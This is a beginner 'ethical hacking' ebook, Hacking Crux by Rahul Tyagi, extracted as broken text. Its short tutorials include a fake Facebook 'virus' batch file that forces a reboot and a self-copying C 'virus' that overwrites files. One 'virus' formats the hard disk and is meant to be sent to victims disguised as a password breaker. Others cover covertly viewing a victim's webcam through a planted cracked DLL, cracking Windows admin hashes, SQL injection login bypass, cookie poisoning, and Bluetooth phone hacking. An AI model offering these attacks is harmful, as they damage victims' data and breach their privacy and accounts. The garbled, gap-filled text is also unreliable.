Hacking Crux by Rahul Tyagi
Hacking Crux by Rahul Tyagi
Hacking Crux by Rahul Tyagi
1
Legal Disclaimer
Any proceedings and or activities related to the materia l
contained within this volume are exclusively your liability. The
misuse and mistreat of the information in this book ca n
consequence in unlawful charges brought against the persons in
question. The authors and review analyzers will not be held
responsible in the event any unlawful charges brought against
any individuals by misusing the information in this book to break
the law. This book contains material and resources that can be
potentially destructive or dangerous. If you do not fully
comprehend something on this book, don‘t study this book.
Please refer to the laws and acts of your state/region/
province/zone/territory or country before accessing, using, or in
any other way utilizing these resources. These materials a nd
resources are for educational and research purposes only. Do not
attempt to violate the law with anything enclosed here within. If
this is your intention, then leave now. Neither writer of this
book, review analyzers, the publisher, nor anyone else affi liated
in any way, is going to ad mit any responsibility for your
proceedings, actions or trials.
2
About The Author
3
Preface
Computer hacking is the practice of altering computer hardware and software to
carry out a goal outside of the creator‘s original intention. People who slot in
computer hacking actions and activities are often entitled as hackers.
The majority of people assume that hackers are computer criminals. They fall short to
identify the fact that criminals and hackers are two entirely unrelated things. Media is liable
for this. Hackers in realism are good and extremely intelligent people, who by using their
knowledge in a constructive mode help organizations, companies, government, etc. to secure
credentials and secret information on the Internet.
Years ago, no one had to worry about Crackers breaking into their computer and
installing Trojan viruses, or using your computer to send attacks against others. Now that
thing have changed, it's best to be aware of how to defend your computer from damaging
intrusions and prevent black hat hackers. Rampant hacking is systematically victimizing
computers around the world. This hacking is not only common, but is being executed
without a flaw that the attackers compromise a system, steal everything of value and
entirely rub out their pathway within 20 minutes. So, in this Book you will uncover the
finest ways to defend your computer systems from the hackers
This Book is written by keeping one object in mind that a beginner, who is not
much familiar regarding computer hacking, can easily, attempts these hacks and
recognize what we are trying to demonstrate. Here we have incorporated Close 100 best
ethical hacking articles in this volume, covering every characteristic linked to computer
security.
After Reading this book you will come to recognize that how Hacking is affecting
our every day routine work and can be very hazardous in many fields like bank account
hacking etc. Moreover, after carrying out this volume in detail you will be capable of
understanding that how a hacker hacks and how you can defend yourself from these
threats.
4
Acknowledgements
Book or volume of this temperament is tremendously complex to
write, particularly without support of the Almighty GOD. I am highly
thankful to Mr. Naveen to trust on my capabilities, without his support and
motivation it would not be promising to write this book.
Rahul Tyagi
5
INDEX
Introduction
6
How to Play PS2 Games On PC or Laptop
Create Virus In C
7
Bypass Rapidshare Time Limits For Fast Downloading
8
Hack To Make Window Genuine
9
1 Hacking Yahoo Messenger Multi Login
1. Automatic Method
2. Manual
10
Here You Can See I am chatting with two logged yahoo accounts
Rahul’s Suggesion:- “For beginners I will recommend the first method just
download and install the script. People who do know registry they can try to
manually do this hack.”
11
2 Call Your Friend With His Number
Last year in March, early morning I got a miscall, and when I see the
number I was shocked to see that the number which was displaying on
screen is my own number. Quickly i contact customer care and again after
taking at least 23 minutes they replied ―Sorry Sir it is impossible to get any
call from your own number‖.
Then finally I open my laptop and start searching that how can it be possible
to get a call from own number, after a while I come to learn that it is
possible.
A website can help you to do this, here is the full tutorial how it can be done.
4. You will arrive at page shown below. In "Enter a number" box, select
your country and also any mobile number (you can enter yours). Now,
simply hit on "Call Now" button to call your friend with his own number.
5. Bingo!! That‘s It Now Your Friend Will Shocked To see his/her number
displaying on their screen.
Rahul‟s Suggesion: - Well It can happen to anyone. The worst thing is that
the Network Companies have no clue about this, so now if you get any type
of call displaying your own number then don‟t panic.
12
How To Hack Yahoo Webcam
This is new trick to hack web cam of Yahoo messenger. We can view the
other persons Yahoo Webcam, Who is always denying us. One drawback of
this hack is that, you need physical access to the computer whose cam you
want to hack.
http://rapidshare.com/files/108328721/res_msgr.dll
NOTE: Don‘t replace the file. Delete the file first and then paste the cracked
file in the same folder
How it works?
The cracked ―.dll‖ file should be placed in the victim‘s computer (whose
web cam u wants to see). Then you go back to your system and login to your
messenger and place a ―request‖ to see their cam. Then definitely they will
press ―NO‖ this is the place where the crack will work. The moment they
press ―NO‖ u will start seeing them.
Rahul‟s Suggestion: - “As you see its so easy to see anyone‟s webcam what I
suggest do not give your laptop or pc for use to anyone whom you not trust
Their 3 minute work can cause you privacy damage for whole life.”
13
Create A Facebook Virus (Funny)
Creating virus is illegal but creating funny virus is not. Here I will show you
how to make a funny virus to panic your friends.
In this tutorial I will show you how to make Facebook virus using simple
commands on notepad. .This will make the victim think they have got a
virus when they click on an icon such as Internet Explorer.
1) Open notepad
2) Type this in :
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR
FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE
THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ―SORRY!!! YOUR FACEBOOK ACCOUNT ARE
NOW BEING DELETED!!! PLEASE WAIT ..........."
14
4) Here the Virus is created and ready to use
5) Send it to your friends and say them it can break Facebook accounts
When He/She double click it a message will open and their computer will
restart.
After five minutes windows will restart, that is all. This is totally harmless
and will give you a laugh.
NOTE: - The hack can be changed and use to make orkut virus or hi5.
15
Protect Email Accounts From Spam
The following methods can be used to combat email spam.
1. Use spam filters for your email account. If you‘re using email services
like Gmail, Yahoo, Hotmail etc. then spam filters are used by default. Each
Spam filter has it‘s algorithm to detect spam emails and will automatically
move them to SPAM folder. This keeps your inbox free from spam.
However some spam emails become successful to make their way into the
inbox by successfully bypassing the filters.
2. Do not post your email address in public forums, user comments and chat-
rooms. Give your email address only to trustworthy websites while signing
up for newsletters.
4. While posting your contact email address on your website use this format:
emailaddress [at] mysite.com instead of [email protected]. This
protects your email address from being indexed by spam bots.
16
Find Who Is Invisible In Yahoo Messenger
Sometimes some of your friends who appear offline in yahoo messenger
may not be actually offline; they may in the 'Invisible' mode. This may be if
they are trying to ignore you or are too busy to talk to anyone.
Just go to these below sites which can directly show you the status of your
friend ID
http://www.vizgin.com
http://www.invisible.ir
http://www.xeeber.com
Firstly open your yahoo messenger main window and double click on
the name of the person whom you want to check.The chat window will open
obviously.
1.If the user is offline Doodle are will show this "waiting for your friend to
load Doodle" continuously .Like Below picture below:
17
2. If the user is online (but in invisible mode), after few, you should get a
blank page like in the picture below. So you know that the user is online.
Rahul‘s Suggesion: - ―Some people use softwares like buddy spy to check
who is invisible. I DONT RECOMMEND you to use such third party
softwares as they can expose your Pc to hackers by sending your personal
information and can even steal information from your Pc.”
18
How To Trace an Email
Generally, the path taken by an email while traveling from sender to receiver
can be explained by following diagram.
So here is the method of tracing the exact location from the email sent.I am
showing the email tracing on yahoo here but gmail and other mail providing
services have same concept.
Step 1:-First open up your email account and click on your inbox.
Step 3:-After Opening scrool the mail at the end and in right corner you will
see a option FULL HEADER click on it
19
Step 4:- Now Closely Look at the the header you will find the whole detail
that from which IP address it is sent.
20
Format Hard Disk With Notepad
Notepad is a basic text editor you can use for simple documents or for
creating Web pages. To create or edit files that require formatting, use
WordPad.
But now I will show you how you can create a dangerous script in binary
language to format hard disk by just running it.
First open the notepad as I shown above and type the below given binary
value
Now save this as any desired name i like password breaker.exe ,because
many people when received this start opening that without inspecting
anything.
Here is the virus ready to send, it will format c drive of your hard disk.
Rahul‟s Suggesion: -“Do not use this hack to break law in your country.
This is for just education purpose only to show how hacker creates such type
of viruses and also do not test this hack on your own computer or office
where critical data is stored”
21
Hack Open of Right Click
We often use right click to open any document or folder or a drive with
option Open. So one day I thought why I cannot change the Open with my
name. So I found a hack to do this. Here is the tutorial to do this
22
Step 4:- Now look for FOLDER then after finding folder open its tree ,open
shell options tree then you will shee Open there click on OPEN don‘t open
its tree I am saying juts click on open.
Step 5:- On the right hand side double click to open (Default).and fill the
name you want to enter I will fill here Hacking Crux By Rahul.
Rahul‟s Suggesion:- “This Hack can be done in two ways first that is
manually which you are seeing now and other way is to through a automatic
script.But I preffer manual method.”
23
Hack To Hide Your Total Hard Disk
You may often seen in cyber cafe‘s, Offices and in colleges that in my
computer there is only C drive is visible and other drives are hidden. I ask
some people that why only c drive is visible where are others and the
answers I got were pretty funny listed below: -
Well Well Well In the above three answers second answer is close to the
reality actually what happens the administrator of the computer hides the
other drives so that students in colleges or employees in offices can not see
the full harddisk or other data stored in the D,E, or F drive.
Step 2:- Go to second option in User Configuration and follow the path in
the figure below
24
Step 4:- After Clicking on Windows Explorer go to right handside there is a
option Hide These Specified drives in My Computer like below figure.
Step 6:- After Ok And apply your all hard drives in my computer will be
hidden.Like Below Fig only documents will be Shown.
25
Hack Internet Explorer For Advertisement
This hack was found by me in a virus named as ―maskrider.vbs‖, it is
generally a visual basic script to edit the registry and the effect caused by
this virus is that you can not open your hard drives by just double clicking it,
you have to open the drives through right click and then open. Other
problem is created by this virus is that on the top of the internet explorer a
tag line is being written up automatically. So how it was done in this tutorial
I will show you how can do this.
Rahul‟s Suggesion:- “This hack can also be done through manual procedure
but that was too time consuming and off course difficult for the newcomers.”
26
Break Administrator Password In XP
Password cracking is the process of recovering passwords from data that
has been stored in or transmitted by a computer system. A common
approach is to repeatedly try guesses for the password. The purpose of
password cracking might be to help a user recover a forgotten password
(though installing an entirely new password is less of a security risk, but
involves system administration privileges), to gain unauthorized access to a
system, or as a preventive measure by system administrators to check for
easily crack able passwords.
There are many ways to break windows passwords; I will show you how do
it with Cain & Abel v2.0. It is powerful hacking tool which can break of
various kind of passwords using Dictionary, Brute-Force, Cryptanalysis
attacks … This tutorial tells you how to break administrator password and
gain access to admin account with Brute-Force attack.
Just follow steps below.
1) Download Cain & Abel v2.0 from www.oxid.it and install it.
2)Start Cain
3)Click on Cracker tab , on the left choose LM & NTLM Hashes and click
on + sign icon on toolbar then Dump NT Hashes from Local machine
27
4) Now you will see
5) After this will appear windows accounts , right click on account you want
to break password and choose type of attack , in this example I chose brute
force attack. Brute force actually means to start with a letter a and
encrypting it. Then see if the encrypted strings match. If not then b, c,.. until
we‘ve gotten to admin. Then the encrypted strings will match and we‘ll
know that is the right password. Brute force attack is the slowest method of
cracking, but there is no risk that you‘ll not find the password. The thing
about brute force is that the time of cracking rises rapidly depending on how
long the password is, how many characters are being used in it and so forth.
28
29
Rahul‟s Suggesion:- “Cain n Abel is the best software i found, to break
passwords and it works both for Xp and Vista may be for Window 7 because
I did not tested on 7.There are many other softwares used to break admin
password like, Lophtcrack and Bart OS”
30
How To Set Video As Wallpaper
We often set wallpapers as our background wallpaper, but have you ever
though to place any video file as background. Seemed crazy hmm..? I know
your answer is yes. But now I will show you how to set movies and videos
as background of your desktop.
Step 2:- Now Run any movie and in full screen press print screen key to
capture the screen. Here I am Watching Movie 17 again just starting.
31
Tips To Secure Your Wifi Connection
3. Change the Default SSID Name and Turn Off SSID Broadcasting This
will require your wireless client computers to manually enter the name of
your SSID (Service Set Identifier) before they can connect to your network,
greatly minimizing the damage from the casual user whose laptop is
configured to connect to any available SSID broadcast it finds. You should
also change the SSID name from the factory default, since these are just as
well-known as the default passwords
32
4. Disable DHCP For a SOHO network with only a few computers, consider
disabling DHCP (Dynamic Host Configuration Protocol) on your router and
assigning IP addresses to your client computers manually. On newer
wireless routers, you can even restrict access to the router to specific MAC
addresses.
Rahul‟s Suggestion:- “Many from you may not understand the proper
meaning of above security tips but do not worry, just remind the things and
in future it will help you a lot that I am pretty sure.”
33
How To Remove Gphone Virus
Well gphone.exe is nowadays one of the most dangerous virus spreading
very rapidly. It is a Trojan and changes your IE homepage and sends tries to
open gtalk and yahoo messenger. It even sends messages to gtalk contacts.
Its icon is just like that of folder icon and people thinking of folder click on
it get infected by the virus.
Gphone virus basically is a 260 kb .exe file which looks like a folder and it
can take any name of any other folder if you have clicked on the virus folder
which looks like a folder but it is not. If you have a folder name ―movies‖ in
your D drive it will make a exe file in the folder named movies.exe and if
you click on that exe file it too work as a virus. It makes .exe files in all the
folders you have with the name of the folder.
Method 1
34
Method 2
Rahul‟s Suggesion:- “You can download the Glary Utilities from my website
www.ethicalhacking.do.am free of cost.”
35
Common Methods For Hacking Any Website
Starting from the base, Gone days when website hacking was a
sophisticated art, and I was in 10th standard when I heard that
Ankit Fadia hacks into CHIP magazine website but today any body
can access hacking tips through the Internet and start hacking your
website. All that is needed is doing a search on google with
keywords like "how to hack website‖, "hack into a website‖,
"Hacking a website‖ etc. The following article is not an effort to
teach you website hacking, but it has more to do with raising
awareness on some common website hacking methods.
In its simplest form, this is how the SQL Injection works. It's
impossible to explain this without reverting to code for just a
moment.Here is the code
' OR 1=1
36
command which must be satisfied to allow access, will be
something along the lines of:
Where USRTEXT and PASSTEXT are what the user enters in the
login fields of the web form.
So entering `OR 1=1 — as your username, could result in the
following actually being run:
SELECT * FROM users WHERE username = ‗' OR 1=1 — 'AND
password = '‘
In terms of login bypass via Injection, the hoary old ' OR 1=1 is
just one option. If a hacker thinks a site is vulnerable, there are
cheat-sheets all over the web for login strings which can gain
access to weak systems. Here are a couple more common strings
37
which are used to dupe SQL validation routines:
username field examples:
admin'—
') or ('a'='a
”) or ("a”=”a
hi” or "a”=”a
38
most probably will just crash the machine to accomplish a denial
of service attack,this one of the most used method for website
hacking
Cookie Poisoning:
Well, for a starters i can begin with saying that Cookie Poisoning
is alot like SQL Injection
Javascript:alert(document.cookie)
Javascript:void(document.cookie="username='OR'1'='1");
void(document.cookie="password='OR'1'='1");
'
'1'='1'
'OR'1'='1
39
'OR'1'='1'OR'
and so on...
Password Cracking
40
Advance Google Search Tricks
You often find it hard sometimes when you are serching your
book,mp3 song,videos but not now, now in this tutorial I will show
you how to find exact what you want with a software devolped to
make search easy and effective .
Google Hacks is a compact utility that will allow its users to search
google using different google search hacks.
41
Here is a demonstration of this tool here I want to search a video
which is having name ―hacking videos by Rahul Tyagi‖ and it
would be in any format like .mpg,.avi,.wmv,.divx,.flv and when I
click search then
42
Here I got all the hacking videos related to Rahul Tyagi .So with
this you can search anything having 99% accuracy in serching the
desired contents. You can download this software free from this
link:- http://www.ethicalhacking.do.am/GoogleHacksSetup1.6.zip
43
How To Play PS2 Games On PC
Five years back when I got my first graphic card some one told me
that there is an software which can run Play station 1 games on
computer ,I was very happy to have that software and play lots of
PS1 games for more than 1 year BUT now people want some more
so they have a question in their mind that Is there any software to
run PS2 games on PC just like PS1. (Add Evil Laugh Here).
First of all, if you want to know about why you should test/play
your PS2 games on PC, here are a few good reasons:
44
Tutorial
First of all, you‘ll be needing to download software emulater
known as PCSX2 from this website FREE
http://www.pcsx2.net/files/11899 PCSX2 (quite obvious . After
installing it, you‘ll be needing a PS2 bios file (which is normally
named like SCPH-XXXX.bin), this file basically contains all the
information about how a PS2 plays a game. PCSX2 needs this file
to play games on your PC. You will have to search for this file
on Google as I can‘t host on www.ethicalhacking.do.am ,it since
its Sony‘s property. After you‘ve got the BIOS file (SCPH-
XXXX.bin), put it in /bios directory of PCSX2‘s folder.
Now its time to launch PCSX2 and configure it. So run the
emulator.
45
Now you‘ll see the configuration window. If your PS2 bios file is
in the correct location, you should be able to see it in the BIOS
combo list as shown in the screenshot below.
46
Now make sure PEOPs CDVD plugin is selected in the cdvdrom
drop down menu. Also, after selecting the peops plugin, click on
the configure button below it and choose the drive letter that
corresponds to your cd/dvd rom drive. Normally it‘ll be the first
drive letter you‘ll see in the list
Don't forget to configure this cdvdrom plugin and select the correct
drive letter that corresponds to your cd/dvd drive
Press OK so that all the settings get saved. Now you‘re set to play
the game of your choice , just insert any of your PS2 game to your
CD / DVD rom drive and click on File > Run CDVD.
47
Choosing a character.
48
This is almost all that there is to learn. You, little boy can play PS2
games on your own now. Welcome to the world of PS2 emulation.
I hope this guide helped you out in some way.
Rahul‟s Suggesion :-“ The play experience may vary from your
graphic card on INTEL GRAPHICS games will be slow as
compare to high end graphic cards like nVIDIA and ATI, so for
smooth play have latest graphic card ad at least DIRECTX 10.”
49
Access Orkut in a Blocked Network
As you know I am student of Lovely Professional University and
LPU is always in mood to restrict students from surfing social
websites like Facebook and orkut. So from past four years they
were trying hard to make it happen .So here are some firewalls
they have used
1.Nebero
2.Websense
3.GFI-Moniter
4.Cyberom
Orkut
Orkut is the most visited website in Brazil and second most visited
site in India. Stats till May 2008, 53.86% of Orkut‘s users are from
Brazil, followed by India with 16.97% and 23.4% of the traffic
comes from Brazil, followed by India with 18.0%. In 2008, more
than 23 million of Brazilians had an account on orkut. Many
Institutions and Companies blocked Orkut on their Network to
increase productivity.
If you are one of Orkut addicted and dyeing to use Orkut at your
workplace don‘t worry proxy server can help you.
50
connecting to the relevant server and requesting the service on
behalf of the client. Too complicated? okay read the solution.
Solution:-
Download any one from listed proxy server and surf freely
2. Tor :
3. Hotspot Shield :
51
install addons like AdsBlockPlus to remove these ads. Otherwise,
its the best proxy software.
Download: - www.ethicalhacking.do.am/ultrasurf
5. Hide my IP :
This free proxy software not only provides you with free proxy
servers, but also has useful proxy feature of Proxy Checker. You
can adjust your level of anonymity and proxy server speed from
setting tab of Hide Your IP address proxy software.
Rahul‟s Suggesion: - “I use Ultra surf 9.2 best proxy server in the
world can bypass any firewall in the world”
52
Extend Window Vista Activation
We always use Windows which demands activation after 30 days
so in below article I will guide you to how to extend your Vista
activation period, I do not tested it on Window 7 but I guess it will
work too in Window 7.
Ryan from Cybernet wrote a nice article days back that explains
how every Windows Vista user can extend the activation period by
the factor three raising the total time until Windows Vista has to be
activated to 360 days.
The first steps are basically the same as before.
This was the usual way of extending the Windows Vista activation
period from 30 to 120 days. We are now going to increase this
period by the factor two again to have 360 days to activate
Windows Vista.
53
the pc again and the Vista activation period was again reset to
another 30 days. This can be done eight times.
To outline it again:
Rahul‟s Suggesion: - “In India I don‟t think there are much people
that use original Windows, but I really prefer to buy original
windows and software they are free from spyware, trojen and
viruses”
54
Block Sites Without Costly Firewalls
If you work in a kiosk mode PC say a computer cafe or in a school
setting, there are restrictions that you want to enforce when it
comes to sites that users can browse. This is specially important
when you have a family workstation which little kids can use.
Filtering is an option but programs Procon and others can
definitely affect system and browser performance. You can also
use software like AnyWeblock but it is pretty complicated and
time-consuming for busy users to configure.
For starters here‘s a nifty way to filter those unwanted websites off
your computer. For either Vista or Windows XP, go to the
directory C:\Windows\System32\drivers\etc (If C is your default
Windows directory). Back-up first your Hosts file in another
secured directory. Next, open the Hosts file with Notepad (or any
other text editor like Vim or Darkroom). Most probably the file is
in Read-Only attribute so you cannot edit the Hosts file. First off,
right click on Hosts, click Properties and uncheck Read-Only. Now
go open and edit it in Notepad and you will see this:
————————————————————-
————————————————————-
55
Add the following on its own line in the hosts file below 127.0.0.1
localhost:
Save the file and make sure you don‘t save it in txt extension but
choose all files, exit notepad and make sure you check read-only
attribute again in properties. Make sure you have cleared your
browser history or flush the DNS cache, otherwise you will still
see the blocked site. If you cleared the history, fire-up your
favorite browser , You cannot access orkut but you can still access
other sites. Accessing your listed site will return a Server not found
error.
Just a note, For Rahul Tyagi‘s followers, just go to /etc/ folder and
edit Hosts. In Windows 2k the directory should be
56
So in this way if some one want to access www.orkut.com or any
pron site in school he/she will be denied.
57
Hack P4 To Make Core2Dual Processor
Note, this trick is really not recommended as this may
cause windows to provide falsified information to it self and other
applications, which would cause system stability issue and may
slow down the system….
58
Here you can see I changed my processor to 8.0GHz. So go and
showoff to your friends that you have 8Ghz processor he he.
59
Recover Hacked Yahoo Accounts
As we are entered 2010 the hacking future is going to change with
lightning speed as blackhat hackers issue a news to media that in
this year there first target will be ADOBE and YAHOO. So now
what more a common man can do if these companies are not safe
then what about us.
Solution 1
Note: please delete the blank space between help and @ which I
had to insert because Yahoo can't handle long addresses.
Solution 2
60
They will ask you to do certain things and then they compare your
original info with the changed info. Within 24 hrs you should get
your account back!
I am very, very grateful with the person that answered my question and helped
me!!!
Thank you very much!”
Askar
61
Hack To Change Your IP Address
62
15. Right-click back on "Local Area Connection" and go to
properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif
With a little practice, you can easily get this process down to 15
seconds.
63
Some Window 7 Cheats
As you all know Windows 7 RC3 is launched. Here‘s a little cheat
sheet I made up for some of the handy new hot key combination,
many of which I‘ve become quite dependent on!
From Desktop
64
Taskbar modifiers
27. Ctrl + Shift + Click on icon: Open a new instance with Admin
privileges
30. Ctrl + Click on grouped icon: Cycle between the windows (or
tabs) in the group
65
Hacking Tools Used By Hackers
Note:-This Article is only for education purpose
66
#4 Netcat : The network Swiss army knife
This simple utility reads and writes data across
TCP or UDP network connections. It is
designed to be a reliable back-end tool that
can be used directly or easily driven by other
programs and scripts. At the same time, it is a
feature-rich network debugging and
exploration tool, since it can create almost any kind of
connection you would need, including port binding to
accept incoming connections. The original Netcat was
released by Hobbit in 1995, but it hasn't been
maintained despite its immense popularity.
67
#6 Kismet : A powerful wireless sniffer
Kismet is an console (ncurses) based 802.11
10 layer2 wireless network detector, sniffer, and intrusion
detection system. It identifies networks by passively
sniffing (as opposed to more active tools such as
NetStumbler, and can even decloak hidden (non-
beaconing) networks if they are in use. It can
automatically detect network IP blocks by sniffing
TCP, UDP, ARP, and DHCP packets, log traffic in
Wireshark/TCPDump compatible format, and even plot
detected networks and estimated ranges on downloaded
maps.
68
Run Games With Virtual Graphics Card
Many times we are stuck up with a system that just doesn‘t provide
enough juice to run the latest game…the result being-
69
You‘ll see something like
3D Analyzer-Starting Screen
Next, click on ‗Select‘ option.
Select FarCry.exe
70
Next step,select the options as shown.Note that i have selected the
VendorID as 4098 and DeviceID 20400 as i want to select the ATi
Radeon 9800 PRO graphics card(use the index provided in the
screen on the right). Click on Run.Doesn‘t matter even if you don‘t
save the batch file.Your ready to roll ! Please note that the .exe file
is to be selected from the main folder,and not the shortcut present
on the desktop.
For Some Heavy Requirement Games ,you need to tweak the stuff
a bit.
Go to Start->Run->regedit.Then press F3 and search for
hardwareinformation.memorysize.Click on the file,and modify the
binary values to 00 00 00 08.This fools the system into believing
that you have 128MB video RAM.Then select only the ‗emulate
hw tnl caps‘ option.Do not select any other.Select ATi Radeon
9800.Click on Run.
Rahul‟s Suggesion:- “Great tool this is and when I used first time I
played Prince or Persia sand of Time which requires graphic card
at tha time I only have Intel 965 Graphics, and with that and this
software I enjoy playing many games”
71
Restore Folder Option And Task Manager
Many a times when we press Alt+Ctrl+DEL computer users face
this below problem…
When you try to run Task Manager, you receive the message
that „Task Manager has been disabled by the Administrator‟.
And the error message seems funny !
You logged in using the Administrator account and still this error
message. Strange you don‘t know how this has happened. The
strange thing is that it is on the Administrator user identity that you
get this problem.
72
via USB drive, however, the majority of other products are unable
even to guarantee 90% protection.
Download from: -
http://www.taskmanagerfix.com/dl/download.php?id=1
73
Use Mobile Cam as PC Webcam
Not everyone could have webcams still now in this world so
in this tutorial I will give you software which can help you to
use your mobile phone’s cam as webcam to chat on yahoo
or Skype.
Mobiola® Web Camera 3
Turn your camera phone into a high quality wireless (WiFi or
Bluetooth) or wired (USB) web camera. Mobile phone as
webcam with Mobiola® Web Camera 3
Main Functionality
74
Mobiola Web Camera 1.0 consists of two software components:
DOWNLOAD LINK :
http://rapidshare.com/files/96883382/Mobiola_Webcam_2.2.smfor
um.net.rar
75
Hack Yahoo Messenger To Disable Ads
I am using GPRS connections from last 3 years and as you know
speed given y your network provider is not much effective. And
when chatting on yahoo messenger your 40% speed is consumed
by the advertisements displaying at bottom and rooms. So how can
we hack them to save our bandwidth . Here is a software called
Yahoo Messenger Tweaker .
http://download266.mediafire.com/4ljid3ejmfgg/wikilhmywji/Yah
oo_Messenger_Tweaker.exe
76
Create Virus Code In C Language
It will create folder in a folder in a folder and so on run this on your
own responsibility*/
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(‖————————————————————————–‖);
printf(‖\nVirus: Folderbomb 1.0\nProgrammer:BAS
Unnikrishnan([email protected])\n‖);
cprintf(‖————————————————————————–‖);
done = findfirst(‖*.*‖,&ffblk,0);
while (!done)
{ printf(‖\n‖);cprintf(‖ %s ―, ffblk.ff_name);printf(‖is attacked by
―);cprintf(‖Folderbomb‖);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
Rahul‟s Suggestion: - “Well I did not try this virus by my self, so
try this and give me your feedback. But still I do not recommend to
use this virus for bad purpose”
77
Intro To Beast Trojen
Beast is a Windows-based backdoor trojan horse, more commonly
known in the underground cracker community as a RAT (Remote
Administration Tool). It is capable of infecting almost all
78
How Hacker‘s Hack Credit Card
A hacker has many ways to gain a credit card number from an
innocent user. The most common one is known as phishing. In this
technique, the hacker poses as an officer within an organization,
let's say VISA. The hacker sends to a group of email accounts an
alert, instructing the receiver to follow determined set of
instructions before his credit card is cancelled.
If the user is not aware of this kind of fraud, he will insert his
credit card number, his name and expiration date without knowing
he is going to be a victim of an online crime.
The third way is through the online process of buying. Let's say an
adult finds a website with adult content that he or she finds
attractive. It's quite probable that the website is only a masquerade
for acquiring credit card information from you.
What Is A Carder?
A carder is a criminal who specializes in stealing information from
credit cards. Although the majority of them buy the information
from online vendors, some of them are quite savvy on how to
access that information by themselves.
79
read from the magnetic strip all of the credit card information.
Afterwards, the carder will trespass that information to a blank
card available in many identity card stores.
Another mean that hackers use for stealing money from your credit
card is through unused ebay accounts. Once they find a possible
victim, the hacker uses a program that starts bombarding the
account until it breaks it. Once inside, the hacker will use it for
posing as the real user, selling equipment that will never reach the
buyer once he buys it.
80
Hacking Through Wardriving
Wardriving
81
Here above is a car which is well equipped with the wardriving
tools.
82
3. Encrypt your wireless communication. I can‘t stress the
importance of encrypting your wireless communication
enough. Enable encryption and enter a key
83
Stop Blue Screen Restart In Xp
I'm going to tell you a few basic things you can try that should
solve the simpler problems that might be causing your blue screen
on Windows XP.
If it still crashes to the blue screen after letting you on, try to
remember if you made any changes recently. Did you download
and install a program from Internet or from an installation disc?
The program might not be compatible with the OS you are
running. Let's uninstall it and see if that solves your problem.
84
Step 3 Uninstall any new software. Click on your START menu,
click on Control Panel, and then click on Add or Remove
Programs. Find the new program you installed, click on it and click
on Change/Remove. Follow the instructions on the Uninstall
Wizard that pops up. Reboot your PC. Did this solve your
problem?
Step 4 Turn your computer off. Disconnect any
newhardware devices and turn computer back on. Click on START
menu, right click on My Computer, click on Properties. In the
window that pops up, click on Hardware, click on Device
Manager, locate the device you are uninstalling and right click on
it, and click on Uninstall. Reboot your PC. Most times this will fix
the Blue Screen of Death.
If you are still getting the Blue Screen of Death after going through
these steps, then you may have a more serious problem that
requires the help of a computer technician.
Rahul‟s Suggesion: -“ You are not only the one who is fedup from
this blue screen even Billgate one day got this blue screen while
giving seminar of Xp advantage on Win98.”
85
Firewalls and Antivirus Free Of Cost
Pay for anti-virus software from the biggies Symantec/Norton or Mcafee and it'll cost roughly Rs
5000 per year. Yet you can also take advantage of a variety of decent free programmes.
Anti-Viruses
Microsoft Security Essentials.
Launched earlier this year, Microsoft's security essentials package has gone from
strength to strength since coming out of beta testing. The package is completely free to
users of 'genuine Windows machines' - ie it'll verify your copy - and three versions are
available, for XP, Vista, and Windows 7.
Avira Antivir.
The free anti-virus software of choice for techies, Antivir's won many tech publications'
free antivirus round-ups by providing both the most thorough software protection and the
fastest. Yet the reason it doesn't top our list is that it's slightly less user-friendly than the
Microsoft offering, with some of the settings requiring some technical knowledge to get
right. Yet if you've the knowhow, it'll do everything you want it to.
Alwil's Avast! home edition offers great detection of known malware, but it's usually
beaten by Antivir in tests. The latest version's a good all-rounder, providing all the
features you'd get with a paid-for program, but its interface still isn't the best on offer.
AVG Free.
AVG has a long history, and has been through loads of modifications to provide a better
service on its way to the current version, AVG 9. It's protection is reasonably thorough,
though it doesn't offer any real tech support.
Firewalls
If you want better protection, are having problems with Microsoft's firewall, or just want more
flexibility, consider these free firewalls too:
Agnitum's Outpost Free Edition offers the ideal combination of top protection and good
user-friendliness. It's a totally free product so there are no nag screens to contend with,
and it comes highly rated by numerous tech sites.
86
Publisher Tall Emu's Online Armour firewall has been proved very efficient in tests, even
outperforming some big-name commercial equivalents. It's light on resources, and heavy
on security, so well worth checking out.
It's totally free to use but you will need to register and activate the licence by e-mail within
30 days of installation. Whilst Comodo outperforms many similar offerings, it can be
pretty intrusive, especially if you just want a firewall that does it's job no questions asked.
Tech support is available via email, but not by phone.
87
Hacking Mobiles Through Bluetooth
Disclaimer:
Super Bluetooth hack is great tool to play with friends but it can
also be used for teasing personal information, so DO NOT
COMMIT ANY CRIME WITH THIS TOOL.I do not take any
responsibility in that case.
Download : -http://www.mobicreed.com/wp-content/uploads/2009/05/ftp_btmobicreedcom.rar
1) Download to PC.
2) Transfer it to your Bluetooth enabled mobile.
3) Run the Installer (Remember, You must have Java enabled
phone for installing i)
4) He finds it and you will be able to run program
5) Select the language and configure it.
6) Click > Connection
7) Click > Search Devices
8) Choose the “Victim”
9) And start managing with following hacks mentioned
with Bluetooth. [Go to www.ethicalhacking.do.am for Video]
88
Bypass Rapidshare Time Limits
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
89
6. Try the Rapidshare download again.
90
How Hacker‘s Hack Orkut Acounts
1.Orkut Phishing:
91
2. Keylogging :
3. Community links :
This method became much famous in last year. Here, orkut victim
is provided with some javascript (popularly called code) and is
asked to copy paste this javascript code in his address bar for say
changing his orkut theme. When victim does this, his orkut cookies
are stolen and now orkut hacker can hack his orkut account using
orkut cookies. I have written more on orkut cookie stealing in
Hack Orkut account by Cookie stealing.
92
I received an orkut scrap that looks like they are giving the user a
choice of using new features for orkut with your ID and password,
